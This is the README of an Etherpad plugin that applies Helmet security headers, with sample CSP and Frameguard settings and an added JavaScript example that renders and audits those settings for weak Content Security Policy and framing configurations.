![Publish Status](https://github.com/ether/ep_helmet/workflows/Node.js%20Package/badge.svg) ![Backend Tests Status](https://github.com/ether/ep_helmet/workflows/Backend%20tests/badge.svg)

Etherpad plugin to bring in Helmet. Helmet sets security-related HTTP response headers for Express; see the Helmet docs for its capabilities. Helmet also brings iframe embed capabilities into Etherpad.

# Usage
Basic usage is simple: just install the plugin.

# Advanced usage
Use the same settings that Helmet exposes for CSP.

## CSP
```
"ep_helmet":{
  "csp":{
    "directives": {
      "objectSrc": ["'none'"],
      "upgradeInsecureRequests": true,
      "workerSrc": false
    }
  }
}
```
The above CSP will need to be polished over time.
https://ponyfoo.com/articles/content-security-policy-in-express-apps is a good write-up that needs to be referred to and supported.

## Frameguard
Frameguard sets the `X-Frame-Options` header, which is useful if you embed Etherpad in an iframe.
```
"ep_helmet":{
  "frameguard":{
    "action": "allow-from",
    "domain": "https://DOMAINIFRAMEWILLBEHOSTEDIN.com"
  }
}
```
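
Added example (not ep_helmet or Helmet code): how the CSP and Frameguard fragments above map to response header values, with an audit of the merged settings. The `true`/`false` handling is an assumption read off the CSP sample; `renderCsp`, `renderXfo`, `audit` and the `pads.example.org` domain are hypothetical.

```javascript
// Constructed sample: the two settings fragments from this README, merged.
const settings = {
  csp: { directives: { objectSrc: ["'none'"], upgradeInsecureRequests: true, workerSrc: false } },
  frameguard: { action: "allow-from", domain: "https://pads.example.org" },
};

// camelCase settings key -> header directive name (objectSrc -> object-src).
const kebab = (k) => k.replace(/[A-Z]/g, (c) => "-" + c.toLowerCase());

// Assumed semantics, read off the CSP sample: true emits a bare directive,
// false leaves the directive out, an array is a space-separated source list.
function renderCsp(directives) {
  return Object.entries(directives)
    .filter(([, v]) => v !== false)
    .map(([k, v]) => (v === true ? kebab(k) : `${kebab(k)} ${v.join(" ")}`))
    .join("; ");
}

// X-Frame-Options value corresponding to a frameguard block.
function renderXfo({ action, domain }) {
  return action === "allow-from" ? `ALLOW-FROM ${domain}` : action.toUpperCase();
}

// Checks worth running on the settings before deployment.
function audit({ csp = {}, frameguard }) {
  const d = csp.directives || {};
  const findings = [];
  for (const [k, v] of Object.entries(d)) {
    const risky = Array.isArray(v) && v.some((s) => /^'unsafe-(inline|eval)'$/.test(s));
    if (risky) findings.push(`${kebab(k)} permits inline or eval code`);
  }
  if (!d.defaultSrc && !d.scriptSrc) findings.push("no default-src or script-src, scripts are unrestricted");
  // ALLOW-FROM is obsolete: current browsers ignore the header entirely, so
  // framing has to be restricted with the CSP frame-ancestors directive.
  if (frameguard && frameguard.action === "allow-from" && !d.frameAncestors)
    findings.push("allow-from needs a matching frame-ancestors directive");
  return findings;
}

// Constructed variant that passes the audit; not a tested Etherpad policy.
const hardened = {
  ...settings,
  csp: { directives: { ...settings.csp.directives, defaultSrc: ["'self'"],
    frameAncestors: [settings.frameguard.domain] } },
};

console.log(renderCsp(settings.csp.directives), "|", renderXfo(settings.frameguard));
console.log(audit(settings), audit(hardened), renderCsp(hardened.csp.directives));
```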

# Todo
 - [ ] Provide a good CSP example for Etherpad
 - [ ] Provide improved security for Etherpad (using nonce example etc. for inline)

# License
Apache 2
